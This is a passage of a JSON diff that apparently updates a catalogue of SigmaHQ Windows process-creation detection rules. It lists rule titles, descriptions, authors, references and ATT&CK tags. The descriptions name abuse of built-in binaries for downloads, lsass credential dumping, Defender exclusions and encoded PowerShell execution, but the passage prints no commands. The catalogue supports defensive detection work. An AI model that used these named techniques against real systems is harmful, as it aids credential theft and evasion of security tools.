"https://twitter.com/0gtweet/status/1457676633809330184", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", - "value": "Suspicious Sigverif Execution" - }, - { - "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/09", - "falsepositive": [ - "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" - ], - "filename": "proc_creation_win_lolbin_squirrel.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", - "value": "Use of Squirrel.exe" - }, - { - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", "meta": { "author": "Florian Roth", - "creation_date": "2022/01/06", - "falsepositive": [ - "Legitimate use of the UI Accessibility Checker" - ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", - "https://twitter.com/bohops/status/1477717351017680899?s=12", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", - "value": "Suspicious LOLBIN AccCheckConsole" - }, - { - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "meta": { - "author": "Mateusz Wydra, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Legitimate, non-default assistive technology applications execution" - ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "value": "Suspicious Atbroker Execution" - }, - { - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "value": "Suspicious Certreq Command to Download" - }, - { - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "meta": { - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", - "creation_date": "2021/09/30", - "falsepositive": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", - "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "value": "Suspicious Driver Install by pnputil.exe" - }, - { - "description": "Detects execution of of Dxcap.exe", - "meta": { - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", - "creation_date": "2019/10/26", - "falsepositive": [ - "Legitimate execution of dxcap.exe by legitimate user" - ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", - "https://twitter.com/harr0ey/status/992008180904419328", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "60f16a96-db70-42eb-8f76-16763e333590", - "value": "Application Whitelisting Bypass via Dxcap.exe" - }, - { - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/19", + "creation_date": "2022/03/21", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "filename": "proc_creation_win_susp_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1526833181831200770", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] + "tags": "No established tags" }, - "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "value": "Suspicious GrpConv Execution" + "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "value": "Suspicious Process Parents" }, { - "description": "Detect the use of Windows Defender to download payloads", + "description": "Detect various execution methods of the CrackMapExec pentesting framework", "meta": { - "author": "Matthew Matchen", - "creation_date": "2020/09/04", + "author": "Thomas Patzke", + "creation_date": "2020/05/22", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", + "filename": "proc_creation_win_susp_crackmapexec_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", - "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", - "value": "Windows Defender Download Activity" - }, - { - "description": "Detects process dump via legitimate sqldumper.exe binary", - "meta": { - "author": "Kirill Kiryanov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate MSSQL Server actions" - ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/countuponsec/status/910977826853068800", - "https://twitter.com/countuponsec/status/910969424215232518", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "value": "Dumping Process via Sqldumper.exe" - }, - { - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", - "meta": { - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", - "creation_date": "2020/10/05", - "falsepositive": [ - "Automation and orchestration scripts may use this method execute scripts etc", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" - ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", - "https://twitter.com/nas_bench/status/1535431474429808642", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" ], "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ] }, - "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", - "value": "WSL Execution" + "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", + "value": "CrackMapExec Command Execution" }, { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", "meta": { - "author": "frack113", - "creation_date": "2021/07/12", + "author": "Florian Roth", + "creation_date": "2021/04/29", "falsepositive": [ - "App-V clients" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "filename": "proc_creation_win_powershell_defender_exclusion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ] }, - "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", - "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" + "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", + "value": "Powershell Defender Exclusion" }, { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", "meta": { - "author": "frack113", - "creation_date": "2021/07/16", + "author": "Florian Roth", + "creation_date": "2019/10/22", "falsepositive": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" - ] - }, - "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", - "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" - }, - { - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "meta": { - "author": "frack113", - "creation_date": "2022/05/16", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_lolbin_ttdinject.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "value": "Use of TTDInject.exe" - }, - { - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", + "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://github.com/Neo23x0/DLLRunner", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" ], "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1218.011" ] }, - "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "value": "Time Travel Debugging Utility Usage" + "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "value": "Suspicious Call by Ordinal" }, { - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "description": "Detects EmpireMonkey APT reported Activity", "meta": { - "author": "frack113", - "creation_date": "2022/05/28", + "author": "Markus Neis", + "creation_date": "2019/04/02", "falsepositive": [ - "Unknown" + "Very Unlikely" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml", - "level": "medium", + "filename": "proc_creation_win_apt_empiremonkey.yml", + "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218.010" ] }, - "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", - "value": "UtilityFunctions.ps1 Proxy Dll" + "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", + "value": "Empire Monkey" }, { - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/01", + "author": "Florian Roth", + "creation_date": "2017/10/22", "falsepositive": [ - "Legitimate testing of Microsoft UI parts." + "Renamed SysInternals tool" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", - "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "value": "Use of VisualUiaVerifyNative.exe" - }, - { - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/07", - "falsepositive": [ - "Utilization of this tool should not be seen in enterprise environment" - ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", + "filename": "proc_creation_win_apt_ta17_293a_ps.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ] }, - "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "value": "Visual Basic Command Line Compiler Usage" + "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", + "value": "Ps.exe Renamed SysInternals Tool" }, { - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/09", + "creation_date": "2022/11/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", - "value": "Use of VSIISExeLauncher.exe" - }, - { - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/01", - "falsepositive": [ - "Legitimate use by a software developer" - ], - "filename": "proc_creation_win_lolbin_wfc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", - "value": "Use of Wfc.exe" - }, - { - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "meta": { - "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", - "creation_date": "2022/05/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_winword.yml", + "filename": "proc_creation_win_lolbin_kavremover.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", - "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" ], "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "value": "Kavremover Dropped Binary LOLBIN Usage" + }, + { + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "meta": { + "author": "frack113", + "creation_date": "2022/04/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "value": "Suspicious Msiexec Load DLL" + }, + { + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runscripthelper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", "attack.t1202" ] }, - "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "value": "Winword LOLBIN Usage" + "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "value": "Suspicious Runscripthelper.exe" }, { - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "description": "Detects the use of a Microsoft signed script to execute commands", "meta": { - "author": "frack113, manasmbellani", - "creation_date": "2022/02/16", + "author": "oscd.community, Natalia Shornikova, frack113", + "creation_date": "2022/05/21", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" ], "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "value": "CL_Mutexverifiers.ps1 Proxy Execution" + }, + { + "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_devinit_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460815932402679809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" + ], + "tags": [ + "attack.execution", "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "value": "Wlrmdr Lolbin Use as Launcher" + "uuid": "90d50722-0483-4065-8e35-57efaadd354d", + "value": "DevInit Lolbin Download" }, { - "description": "Detects Too long PowerShell command lines", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", + "author": "frack113", + "creation_date": "2021/07/07", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_long_powershell_commandline.yml", - "level": "low", + "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", + "value": "Remove Windows Defender Definition Files" + }, + { + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "meta": { + "author": "Florian Roth, Maxime Thiebaut", + "creation_date": "2021/08/23", + "falsepositive": [ + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + ], + "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/j0nh4t/status/1429049506021138437", + "https://streamable.com/q2dsji", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1553" + ] + }, + "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "value": "Suspicious RazerInstaller Explorer Subprocess" + }, + { + "description": "Detects a base64 encoded IEX command string in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_iex.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, - "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "value": "Too Long PowerShell Commandlines" + "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", + "value": "Encoded IEX" }, { - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lsass_dump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "value": "LSASS Memory Dumping" - }, - { - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/07", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/29", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_mailboxexport_share.yml", - "level": "critical", + 